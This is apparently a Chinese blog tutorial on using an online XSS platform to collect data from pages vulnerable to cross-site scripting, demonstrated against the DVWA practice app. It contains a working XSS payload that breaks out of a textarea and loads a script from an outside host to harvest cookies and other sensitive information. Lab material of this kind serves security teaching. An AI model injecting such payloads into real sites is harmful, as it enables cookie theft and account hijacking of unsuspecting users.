常见利用方法

1. xss平台

https://xsspt.com

可以帮助链接被xss的站点,获取xss站点被攻击后的信息类似beef[beef下节有介绍]。

2. 创建项目

image.png

3. 配置模块

以默认模块为例:

image.png

拉到页面下方选择下一步。

4. 准备植入xss代码

以dvwa为例:
选择xss平台给出的示例方法:


image.png
向dvwa靶场植入下列语言:
</textarea>'"><script src=https://xsspt.com/q9LMWD?1596957037></script>

5. 向靶场植入xss代码

image.png

点击 submit

6. xss平台获取xss站点信息

image.png

点击展开看到cookie等敏感信息
image.png

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

友情链接更多精彩内容